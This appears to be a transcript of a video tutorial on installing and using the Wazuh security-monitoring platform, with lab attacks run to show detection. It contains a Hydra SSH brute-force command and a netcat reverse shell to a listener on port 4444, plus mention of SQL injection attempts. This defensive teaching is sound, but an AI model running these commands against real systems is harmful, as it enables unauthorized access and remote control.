So there is this awesome free cybersecurity tool that you can get, and you can use it to learn about security monitoring. And it's called Wazoo or Waza. And the other best part is that it's also open source. So you can take a look at how it's being built, how it is being used to do all this analysis of different type of security attacks, different types of malicious software it could be running inside of the operating system, and so on. And I'm going to be teaching you today how to install it and also how to operate on it. For example, getting the endpoints installed with the agent, so we're collecting the telemetries and sending it back to the mothership. And of course, we'll be doing some hacking along the way to show you how it's done. And then after which we detect that directly from Wazoo. So now in terms of architecture, of course, you have the mothership. So in this case, we have the Wazoo. So I'm going to call it the blue over here. And I'm going to draw a spaceship so that this is the mothership where we'll be collecting and analyzing all of this different events. So you'll be doing things like what I call as security analysis, right? So of course, you first have the log collection. So you're collecting all these different types of logs, either from the operating system itself, it can be from network devices. And then after which we do what we call as analysis. So in security analysis, we're looking at, hey, from this particular log, later on we'll take a look at some of them examples, is, for example, if there is a failed authentication, like multiple retries, multiple failures to authenticate. So that could be an example of an attack, like a brute force against Secure Shell. Or it could also be, say, for example, a SQL injection attack directly against a HTTP server that you have. So that may also appear in the logs. And then from there, we're doing all this different type of analysis. And this analysis are powered by rules. So these security rules are what helps us determine whether a security event that has occurred from the logs is considered as a malicious event. And most importantly, we also have the devices. So in this case, it could be your server. So I have a Ubuntu server, and then of course we have an agent installed onto it that is then sending the telemetries or the logs over into the mothership. So of course, you can also have your network devices that can also have this type of telemetries. And of course, they'll be sending them likewise over into the mothership. And of course, the more devices that you have, you can install the agent easily on them. And as you install them, you'll be targeting specifically, all right, where are the log sources? So it could be in var/log, etc. Okay, so all these are the different places that are storing logs, and you want to target those areas so that you can analyze them directly from the mothership. So the mothership is doing all of this heavy lifting for you. So instead of doing the compute directly on devices itself, if you do that, that could lead to overutilization of the compute, because many of these servers are used for other things. Say, for example, it's an application server, it's a API, and so on. And that's their primary goal. And what you want to do is then to take those logs, stream them over into a security monitoring system. In this case, we have, of course, Wazoo or Waza, that is then doing all this analysis for you. So you are putting those heavy lifting, all right, offloading them over into a separate compute server. So right now, I'm logging over into a Ubuntu server, and I'm on the website Wazoo, and this is the documentation, and we are in Quick Start. Okay, this is the reason why we're in Quick Start is because we want to just install everything directly into a single server. All right, so in this case, we have probably a couple of agents, and then we have the CPU expectation, the memory, as well as storage, which we are meeting using this Ubuntu server. Of course, you would have your own setup. So depending on how big your environment is, that you can cater to it by setting up more specific kind of CPU, memory, as well as storage to cater for that. And of course, in this case, we have operating systems. So in our situations, we have Amazon Linux 2023, and so on. So that's great, perfect. I love Amazon because I work there, of course. You have Red Hat. You also have Ubuntu. So of course, in our case, we have Ubuntu running. So we can also do that too. So of course, as we scroll down further, the first thing we can do is just directly use the Wazoo installation assistant. So this is going to save us a lot of time in terms of getting it up and running quickly. All right, so we'll be using this one, download and run the Wazoo installation assistant. So let's go ahead and do that. So we have the instructions here. So you have the curl packages, all right, and after which is followed by a sudo bash./wazoo install. So let's go ahead and do that. So go ahead and open up a terminal, and let me just zoom in a little more. Okay, so what I'll do now is go ahead and copy it, paste it, hit enter on that, enter my password. Of course, my password is password, or 123456778. Either of these two are my password. You can try logging into my Gmail, Hotmail, whatever. Because why? You know, people think that a hacker, professional hacker like myself, is going to use some super complex, difficult to remember kind of password, but the reality is, no, I use a simple password. Anyways, back to the topic here. Starting Wazoo installation. All right, we have Wazoo Indexer, dashboard already installed, FileBit already installed. I want to overwrite the current installation. Why not? Right, let's go ahead and do that. So in my case, what I want to do now is just go ahead and do a -O to overwrite. Hit enter on that. All right, so with that, oh, by the way, I should skip the first command because we have already downloaded it. So it's removing the existing Wazoo installation, removing the Wazoo Indexer, removing FileBit, all right, and the list goes on. So just give it a while more, and then after which we'll be starting with a fresh copy of it. So you're seeing here, it's really quick to get it started. Verifying that your system meets the recommended hardware requirements. Okay, Wazoo Web Interface port will be 443. Okay, that's nice. All right, generating configuration files, root certificates, Wazoo Index installation. It takes a few minutes for the installation to complete, so just be patient. Okay, Wazoo Indexer installation finished. Post-installation configuration finished. Starting service Wazoo Indexer. Initializing. All right, starting the Wazoo Manager installation. This is pretty good, even for home lab. Like I have a security lab at home, and when I install this, I can be monitoring. So I can be putting on my black hat as well as my defender hat. All right, so I'm playing both offense and defense at the same time. In the past, from a lot of videos that I was doing, it's mainly black hat stuff. But now it's like, okay, we are exploring more of being a defender, more of being like a security analyst, being a security engineer. So this is pretty fun. And yes, I'm doing a lot more tutorials on security, right? It could be cloud security, since my day job is hardcore cloud security stuff. So I'm uploading a lot more of those tutorials as well. So you definitely want to subscribe and turn on notifications if it's your first time here. I recommend that because there's going to be a lot of really interesting stuff that's coming your way, so stay tuned. Okay, starting Wazoo dashboard installation. When I was first exposed to this, I was shocked to know that a security monitoring system like this is free and it's open source. So, big fan. All right. It's probably going to flash the username and password later on. But so what if you know the password? It's not like it's internally accessible to you. I'm not hosting it on the internet. Okay, it's just within my local network. But it doesn't mean you should be flashing a password everywhere, okay? Let me just go back to the documentation. Oh, done. Okay, cool. Just when I want to switch over, so it's done now. You can access the web interface at 443. This is the admin and this is the password. Okay, cool. So let's go ahead and take a look at it. All right, so let's go over into 443. So what is my IP address? IPA. So I got 192.168.0.151. I'm heading over to Firefox now. Let's go ahead and enter that. 151, hit enter on this. Click advanced. Click accept the risk and continue. Enter admin. And of course, a password, it's a really long, secure password. Let's go ahead and enter that. Not enter, copy and paste. Okay, I can't remember this. Paste it, click login. Loading. Okay. 5 checks here. Done. Perfect. Awesome. Okay, we're in. This is it. The setup, the installation is completed. It's really, really nice. I love it. I think this is like one of those things that I really like. And there's going to be a lot of good stuff that can come out from it. All right, so the next thing we'll be doing is just going through a dashboard walkthrough. Okay, and then after which, agent installation, because ultimately, you need the agent to be running. The agents, like I shared earlier, are the ones that you're doing security monitoring. You want to know what's going on. Is it being attacked? Is there a compromise? Is there a misconfiguration? Those are the things that you want to watch out for, okay? From the dashboard itself, it's pretty straightforward. So you have the last 24 hours alerts, so like critical severity, and the rule level goes from 0 to 15. So the higher means the more critical the severity is. And of course, the low could be things that are informational, like a misconfiguration or a small configuration that is happening inside the target endpoint. And then medium, high, and all this will be where likely the server or the asset, the IT asset, is already compromised. And you want to quickly take a look at that. So you can filter by clicking onto any of these severity categories. And then, of course, on the left, you have your agents. So your agents are where you are actively monitoring them and you're communicating with it. And of course, I already have a couple of agents placed into my servers. And what we're going to do is I'm going to uninstall them and I'll walk through the installation process with you so that you know what's going on. And as we scroll down, there are specific modules or sections within Wazoo. So you have the endpoint security. So you have like configuration assessment, which I thought is really good because most of the time when a hack occurs, it's typically because of a misconfiguration. Say, for example, you have SSH access, and instead of using a key, you have a password. All right, so that is considered one of those misconfigurations, and can be many others. Then you have malware detection. Is there some kind of bad malicious software within the endpoint? All right, so you're able to integrate that with VirusTotal if you want to. File integrity monitoring is pretty cool because what it does, you can target specific directories and you can monitor them to see and look at changes for it. So let's say you have a website and someone gained access to your site and there is a defacement. What you can do is you can pick it up real quick directly from the file integrity monitoring if you want to. Threat intelligence is very fun because this is the part where you're going to be able to look directly into the endpoint and say, hey, what are events occurring? What are the alerts that are being highlighted by my rules, by my security rules that I was sharing with you in your architecture earlier, and with vulnerability detection and so on and so forth. So lots of good stuff. And the other really good thing as well is, of course, you also have the integration with cloud workloads like Amazon Web Services. So if your workloads on AWS, you are likewise able to integrate that. Say, for example, they have the integration with CloudTrail that's able to log everything of who is doing what in the AWS control plane. So again, lots of great integration here. And we'll cover some of the key ones, the core modules here, so that we understand how to get started. And then later on, as you're exploring them, a lot of them will be up to you to decide the kind of security scenarios that you want to walk through. And of course, I've got a couple of them for you today. One is through a secure shell brute force, and then the second one will be through reverse shells. So what you need to do now in terms of agent installation, you just go over to the top left corner under agent summary. You can click onto active, disconnected, whatever. And if you scroll down further, you have something called deploy new agent. Okay, so this is the one that we want to click onto. This is the one that will give us the instructions to do the installation. So go ahead and click on that. Okay. And of course, in my case, I am going to be installing it onto another Ubuntu server. So in this case, I'm going to select onto DEB AMD64. You can do it for Windows, for Mac OS. So this is really cool. So you scroll down further. What is the server? The mothership. What is the IP address of that? So in this case, 192.168.0.151. So this is the IP address of the Ubuntu server that is running Wazoo. Okay, so this is the mothership. So once you have that, you can give the agent a name. Okay, so in my case, maybe I'll just give it Ubuntu server. Okay, or Ubuntu endpoint. All right. Scroll down, we'll use the default existing group so you can, again, have different kind of policies for each of the groups. Then with that, that's it. This is the command. All right, just run this command directly into the target server and you would have the agent up and running. Okay, so you have a wget, so it downloads it from the wazoo.com. And then after that, it sets the Wazoo manager and then followed by the agent name. And after which, okay, this is pretty easy. Okay, let's go ahead and copy that. And I'm going to paste it over into my target. So in this case, I'm going to show you the target. Okay, this is target that I have. Let me do a full screen on that so that it's easier for you to see. Okay, maybe I'll just go ahead and do a view full screen mode. Okay, perfect. So this is my endpoint. I'll go ahead and hit enter on this. Downloading. Preparing to unpack, setting up. Okay, this is pretty fast. Let me go back over into the server and see what else. So we just have to do a sudo systemctl daemon reload, enable, and start the Wazoo agent. So let's go ahead and do that. Okay, so we have the sudo systemctl daemon -reload, sudo systemctl enable Wazoo -agent. Okay, sudo systemctl start Wazoo agent. By the way, pro tip here, the second command that we ran here, all right, which enable Wazoo agent, what it does here is if you restart the server, Wazoo agent as a service will automatically start, all right, when you are starting up the server. So you ever need to restart your server for whatever reason, Wazoo agent will be part of that startup, okay? Now heading back over to Wazoo server, I can scroll all the way down, and I can see right here, I have Ubuntu endpoint. So it's up and running. So perfect. I can click onto it, and right here, we have the overview of things. So this is really nice because we can see a lot of things going on. So we have, of course, the IP address, right, the version, the operating system, and we have the compliance information. So if you are working in specific sectors, you may have requirements against, say, for example, payment cut industry data security standard, general data protection regulation, and so on. So you can select onto them. And what it does, it does a check against the server and say, hey, are you aligned? Are your security controls configurations within the operating system, is it aligned to some of these compliance requirements? Okay, so this is really neat. And of course, we have some events going on, like a defense evasion. And then we have the SCA. So this is a scan, a security scan against the target. And let's go ahead and take a look at this. Let's go ahead and click on that. So we can see right here, there are certain things going on. So CIS stands for Center for Internet Security. And of course, you have the Ubuntu Linux. So this is a benchmark. And we can see the score. Okay, we have lots of failures. So it would give examples like ensure TMP is a separate, right? You can click onto that. Making TMP its own file system allows administrators to set additional mount options and so on and so forth. Right, so this is a failed result. And of course, there's a remediation instruction for you. And this is really good because when you're trying to learn cybersecurity, having guidance like this and having experience, hands-on experience, cements your understanding about how some of these security controls work, particularly in the world of security operations, in the world of security monitoring. So this is a really good start. And I highly recommend that you try this out, okay? And typically, if you are a security analyst, you are a defender, you have to look and comply to a lot of all these different security standards depending on where you work at. And all these are really critical because properly configured your systems are, the less probability of you getting compromised. So this is an important starting point for you as a defender, okay? Or even as a hacker, because you want to know what kind of security controls might be implemented directly onto those workloads, okay? Now I told you we're going to do some hacking. Absolutely, right? So I have Metasploitable 3 here running. I can click onto it, and we can see right here, there are several of these modules that we can click onto, and the one that we'll be focusing on or learning on is threat hunting. So in that case, I can see here, this is the compliance check. All right, we have so on and so forth. Again, it's a very outdated operating system, so perhaps some of the controls are simply not there, okay? So what I want to do now is just go ahead and click onto threat hunting. And of course here, we have the date, so we can filter by that. So if you see over here, we can say, okay, the last 24 hours, okay, or the last 7 days, you want to see what kind of security events are happening to this target server or endpoint. We can filter by that, so pretty clean. So let's say the security incident happened a month ago, 30 days ago. You may want to go back in time and see what happened, and you want to know what is affecting this specific endpoint. So we can see over here, we have the events are occurring, authentication, and so on and so forth, okay? So if I was to go ahead and click under events, events is where the things are happening, all right? This is the part where we want to know, hey, was there a attack against the target? All right, so this last 24 hours, we can see the login session closed, open, first time user executed, super user do. So lots of great information here. And what I'm going to do now is to simulate some attacks directly from Kali Linux against Metasploitable 3. Now going over to the overview of this target, we have the IP address of 192.168.0.207. Okay, let's go ahead and do a scan, uncover some services in regard to this endpoint, and try to do some attack on it and see whether we can pick it up from Wazoo. So I've switched over into Kali Linux, and you can see here I'm doing an Nmap, network mapper. So we're scanning against this specific IP address. Let's go and enter super user do, enter my password, hit enter on that. Oops. Okay, let me just go and switch this up as V, all right, service version. Let's see what we got. What kind of services can we get a hit on? And then after that, possibly try to target one of those services. And of course, I already know what kind of vulnerabilities are inside this server. For example, the secure shell is possibly open, all right, and we can use a username password to try to brute force against it. Okay, so we are able to see the different services they're running for this specific endpoint. And of course, we got SQL, we got secure shell, and let's go ahead and do a brute force against the SSH. So let's go ahead and enter Hydra-L, okay, maybe Hackerloy, -P, USR, share, witless, wfus, and we have, say, for example, under maybe others, common pass, okay, why not? And then with that, I can enter SSH, 192.168.0.207, all right, 207, that is correct. Hit enter on that. So we're doing a brute force attack right now. I'm going to go ahead and cancel it because it's going to be very noisy. It's going to be jamming up so much passwords over into the target. Okay, so you can see here we have the max 16 tasks per one server and so on. So if I head back over into the Ubuntu server that has Wazoo running, I can go ahead and click on to say threat hunting. Okay. And I want to see whether we got some kind of events that are going on for this target. And you can see right here, we managed to capture it. So you have, for example, it has a FTP service that is running. So it pick it up and say, hey, there is some telemetries that someone is probing our FTP. There is 400 error code. So they were targeting our web server. They were attempting to log in, all right, using a non-existent user. So it was able to pick it up. So Hackerloy doesn't exist, all right, inside this specific server or service. So if I go ahead and expand on it, we are able to see a few more things. So what I can do now is go ahead and head over to, say, one of the events, inspect document details. Let's go ahead and click on that. And you have right here, this is the information. So we have the agent name, Metasploitable 3, the IP address, and we have the source. So the source is who is targeting us. So in this case, we're 192.168.0.105. So if I head back over to Kali Linux, I can enter IPA, and I can see the IP address of 192.168.0.105. So that is correct. It is coming from this source. And if I head back over to the server, I can see that this is the secure shell. All right, we have an invalid user Hackerloy. So I was using the username Hackerloy to try to log in to secure shell, but this user does not exist. All right, so you can see right here, we have the rule description, attempt to log in using a non-existent user. Okay, so this is one example of it. And the good news, it also maps some of this tactic and techniques back to MITRE. All right, so in this situation, we have credential access, lateral movement, password guessing, secure shell. So it's telling us some of these details too. And of course, it also has the rule to National Institute of Standards and Technology, PCI DSS. I was sharing with that with you earlier on that. So we're able to get this very, very nicely. So this is really, really good. And of course, you can click onto the rule ID. Okay, so we navigate over to the rule. And you can see right here, it has a match. All right, it's looking for the following. Okay, illegal user or invalid user. All right, so this is the example of it. Any other related rules, you can expand on them. And of course, you have the file, you have the path. Okay, let's go ahead and click onto the file as well. We're able to see all these details. So the rules was what I was telling you earlier. As the logs are streamed over into the mothership is the one that is doing the security analysis. And the security analysis comes from the rules. The rules get triggered when it's able to uncover that, hey, there is this log, and this log has certain values in them, and that's why it triggered that. Okay, so this is the example of it. So we have, like, for example, ID 5701, reverse lookup, possible break-in attempt, and so on and so forth. So all these are ways for us to know what's going on. So these are the rules that we can take a look at easily. So for example, you have the file here. I can click onto the file. So we have the 0095 SSHD underscore rules. If you scroll down further, all right, you have the decoded. We have the rule. So we have the MITRE, the group. Okay, we can scroll down further. We have the regex, failed. Okay, possible break. So these are the details for you to look at. All right, so if you want to go as granular as this, you can. All right, you have the option of doing that. And if you want to build your own custom rules, you can do that too. The other example I want to show you is, in this case, I can enter NC NLVP4444. So I'm setting up a listener on my Kali Linux machine. Now, heading back over to the Ubuntu endpoint, what I can do is I can enter NC 192.168.0.105, which is the Kali Linux IP address that has the listener. And I enter -e/bin/bash. I hit enter on this. Oops, let me go and enter the port. 4444, hit enter on that. And then if I hit back over to Kali Linux, we're in. Okay, so we have reverse shell, we have connection, we have remote control of the target server. I can enter who am I, hackerloy, I can enter ls, and so on and so forth. So we're in, we have access to it. And what I want to show you here is the custom rules that we can build along with that. So say, for example, I hit over into the Ubuntu server, and of course, I go over into the agents, and I hit over to Ubuntu endpoint. I go to threat hunting. I go over to events, and you can see right here where the following. So we have, like, for example, with audit, all right, USR bin ls, who am I, bash, NC, and so on. Okay, so we got data here. We got interesting information here too. Okay, so this is an example of being able to detect it with a custom rule. And I'm going to add one custom rule here to do the NC detection. Now what we're going to learn is how can we detect, in this case, unauthorized processes. All right, so what we need to do is to go over to the Wazoo agent under var ossec at c ossec.conf, and with this file, we add the following. Okay, so it periodically get a list of running processes. So in this case, we have foo command, ps-e-o, process ID, you name a command. Okay, and frequency is every 30 seconds. So let's go ahead and copy this, go over to the Ubuntu endpoint. All right, let me go ahead and exit this one. Clear. And then what I do is do a sudo vim, hit enter on that, and see the following over here. Okay, so we have, for example, local file or a syslog and all these different details. So what I'm trying to look for is the one over here, which is ossec local file foo command. Okay, let's go and see if we have this one over here. Let's take a look. We have journal ID, Apache, all right, error log, access log, audit, syslog again. Okay, let's go ahead and copy this one, which is the following of local file, all right, and so on and so forth. And we'll copy this one. Okay, hit back over to the endpoint. Okay, let's do a proper formatting for it. Okay, so we have the foo command, process list, and so on and so forth. Let me search for process. Okay. All right, cool. That's the only one. Perfect. So once we have that, let's do a right quit. And we can do a sudo systemctl restart wazoo-agent. Okay, perfect. So it's restarting now. Okay, done. So I head back over to the instructions. Okay. Then we have ncat or nmap. All right. And what we want to do now is head back over to the Wazoo server. And we want to add the following rules over here. Okay, so this is the local rules. Let's copy that. And let me go ahead and enter the following. Sudo vim, paste this, hit enter on that. Let's see if we already have this one. All right, so I got the following. Okay, we got SSHD, authentication failed. And the following. Let me go ahead and add this one, the new one over here. So this is the one, group name. Let's copy this. Head back over to terminal and paste it right here. So we got it here. Right quit. And let's go ahead and restart it. All right, it will say, hey, restart the Wazoo manager. Let's copy that. Head back over to terminal, paste it, hit enter on that. Give it a few seconds to restart. And let's see what other instructions they got for us. Okay. Run nc-l. Okay. So as long as you're running netcat, it will pick it up. All right. So you can see over here, nc-l. Okay. So that's a listener. So you have a listener, immediately you'll pick it up. So that's pretty cool. Now going back to the Ubuntu endpoint, if I enter nc-l and then followed by say 8000, I hit enter on this and it will pick up on the Wazoo server. So if I head back over to threat hunting, I will remove NC. I will just go back dashboard, click onto events. Let's see if we get a pickup for this one. Let me do a refresh. Let me remove my search. Hit enter on that. There you go. So we got it right here. The rule has been created. And if I head over and click over to the document details, we can see that there is an alert. And we have the log over here. So this is the full log. And we have the following, right? Process list, netcat listening for incoming connection. And this was a custom rule that we have created. So really good. Okay, last but not the least is detecting a SQL injection attack. So in this case, you can see over here, we have the Ubuntu endpoint configuration. All right, so in my case, we have already installed the Apache web server or service. And then we have enabled the firewall. So if you have a firewall, you can do that. And we can check whether the Apache server is running. Okay, so let's go back to our Ubuntu endpoint. And what I can do now is go ahead and enter sudo systemctl status apache2.service. It is running. Okay, it's up and running right now. I head back over to the server. And I can see the following. All right, we can curl. That's good. So we have the following of the ossec.conf. And what I can do now is go ahead and look at it here and see whether we're monitoring it. And we saw earlier, yes, we are. But I just want to show it to you again. So sudo vim, hit enter on this. So you can see that we have the following of Apache. All right, so we have Apache error.log as well as access.log. Okay, so we're looking at these logs. All right, so with that, we are ready. So if I head over into the Wazoo agent, I don't have to restart it because it is already inside the configuration file. And what I can do now is just go ahead and run a attack emulation. All right, so I can copy, say, this one. So switching back to Kali Linux, we have the following SQL injection example payload. I hit enter on this, okay, not file. And if I head back over into Wazoo, I can see under the Ubuntu endpoint. Let's do a refresh and see if we're picking it up. There you go, done. Really awesome. So we got the SQL injection attempt. Okay, so we're able to see it really quickly. So all I got to do is click onto the inspect document details on the left. All right, you can see right here, we have the data .url, so we're able to pick it up from the web access log. All right, so we can see this is the full log over here. And of course, the location came from access.log. So we're able to see this kind of details really, really quickly to help us identify this kind of attack. And of course, if you want to take a look at the rule, you can click onto it and it gives you the information. Okay, so it's looking for patterns. So you can see over here, pattern equal, select, insert from, where, union. So all these are some of the common SQL injection payload patterns that you're able to try to match against. And if it appears, which is uncommon, then it is an attempt. It is an attempt to try to hit one of your parameters through a SQL injection attack. So that's it. That was a really awesome beginner tutorial on security monitoring with Wazoo. We learned how to install it. We learned how to set it up through the agent installation deployment into a target server. We were looking at some of the rules that's available. Some of them are out of the box. Some of them just require a little bit more customization, and we're able to get it up and running. So that was really good. So stay tuned for even more exciting tutorials coming your way. So remember, turn on notification, turn on subscription to the channel so they can learn even more on cybersecurity. Take care.